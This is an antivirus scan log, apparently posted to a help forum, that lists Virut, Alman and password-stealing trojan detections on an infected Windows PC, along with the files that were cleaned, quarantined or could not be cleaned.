1/20/2008 5:06:18 PM Real-time file system protection file D:\EXTRAS\SOMETHING\LOVEX.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:05:54 PM Real-time file system protection file D:\CIES INTERNET\ANTI-VíRUS AVG 7.0 + SERIAL\AVG70F_148.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:04:51 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242074.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524427.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524401.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:05 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524400.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524392.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:04 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524398.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510607.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:02 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510608.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:01:00 PM Real-time file system protection file E:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP118\A0510603.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 5:00:26 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{44EE1785-CF13-4E08-82F5-B87CAD9CA49B}\RP130\A0242078.EXE Win32/Alman.NAB virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524445.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:39 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP126\A0524446.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:37 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP119\A0510708.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:56:35 PM Real-time file system protection file F:\SYSTEM VOLUME INFORMATION\_RESTORE{E0D48EB5-43E1-4C9F-8E26-394D2DB062CB}\RP108\A0470803.EXE Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:52:45 PM Real-time file system protection file C:\WINDOWS\LINKINFO.dll Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Internet Explorer\iexplore.exe.
1/20/2008 4:45:30 PM Real-time file system protection file C:\WINDOWS\LINKINFO.DLL Win32/Alman.NAD virus deleted (after the next restart) - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:44:52 PM Real-time file system protection file C:\Program Files\Internet Explorer\iexplore.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:55 PM Startup scanner file C:\WINDOWS\system32\msiexec.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:54 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:53 PM Startup scanner file C:\WINDOWS\system32\cqmjp.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:52 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:51 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:50 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:49 PM Startup scanner file C:\WINDOWS\49400WO.DLL a variant of Win32/PSW.WOW.SV trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:48 PM Startup scanner file C:\WINDOWS\49400MM.DLL a variant of Win32/PSW.Legendmir.NFF trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:46 PM Startup scanner file C:\WINDOWS\49400WL.DLL Win32/PSW.Legendmir.NFN trojan cleaned by deleting (after the next restart) - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:45 PM Startup scanner file C:\WINDOWS\Explorer.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:44 PM Real-time file system protection file C:\WINDOWS\system32\taskmgr.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: \??\C:\WINDOWS\system32\winlogon.exe.
1/20/2008 4:41:41 PM Startup scanner file C:\WINDOWS\explorer.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\userinit.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\logon.scr Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\WINDOWS\system32\ctfmon.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:40 PM Startup scanner file C:\Program Files\Messenger\msmsgs.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:38 PM Startup scanner file C:\WINDOWS\system32\logonui.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\system32\rundll32.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\Program Files\Common Files\Real\Update_OB\realsched.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:37 PM Startup scanner file C:\WINDOWS\49400W.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:35 PM Startup scanner file C:\WINDOWS\49400L.exe Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:33 PM Startup scanner file C:\WINDOWS\49400M.exe probably a variant of Win32/PSW.WOW.WU trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:31 PM Startup scanner file C:\WINDOWS\system32\vgbxiqre.exe probably a variant of Win32/TrojanProxy.Ranky trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:30 PM Startup scanner file C:\Program Files\QuickTime\qttask.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Winamp\winampa.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:29 PM Startup scanner file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:28 PM Startup scanner file C:\WINDOWS\system32\iexplore.exe a variant of Win32/Poebot trojan cleaned by deleting - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\Program Files\Common Files\InterVideo\SchSvr\SchSvr.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCMTR.EXE Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:25 PM Startup scanner file C:\WINDOWS\ALCWZRD.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\SOUNDMAN.EXE Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:24 PM Startup scanner file C:\WINDOWS\system32\Hdaudpropshortcut.exe Win32/Virut.AC virus cleaned - quarantined ZAKI-62BB782010\zaki
1/20/2008 4:41:23 PM Startup scanner file C:\WINDOWS\system32\hkcmd.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:22 PM Startup scanner file C:\WINDOWS\system32\igfxtray.exe Win32/Virut.AC virus internal error ZAKI-62BB782010\zaki
1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Common Files\Real\Update_OB\r1puninst.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:13 PM Real-time file system protection file C:\Program Files\Real\RealPlayer\realplay.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
1/20/2008 4:41:12 PM Real-time file system protection file C:\WINDOWS\EXPLORER.EXE Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to access the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\WINDOWS\system32\verclsid.exe Win32/Virut.AC virus cleaned - quarantined NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\WINDOWS\Explorer.EXE.
1/20/2008 4:41:11 PM Real-time file system protection file C:\Program Files\Google\Google Talk\googletalk.exe Win32/Virut.AC virus internal error NT AUTHORITY\SYSTEM Event occurred during an attempt to run the file by the application: C:\Program Files\Google\Google Updater\GoogleUpdater.exe.
- chillpill_rohit
- Forum Newbie
- Posts: 15
- Joined: Thu Jan 17, 2008 3:54 am
Who is online
Users browsing this forum: Google [Bot] and 1 guest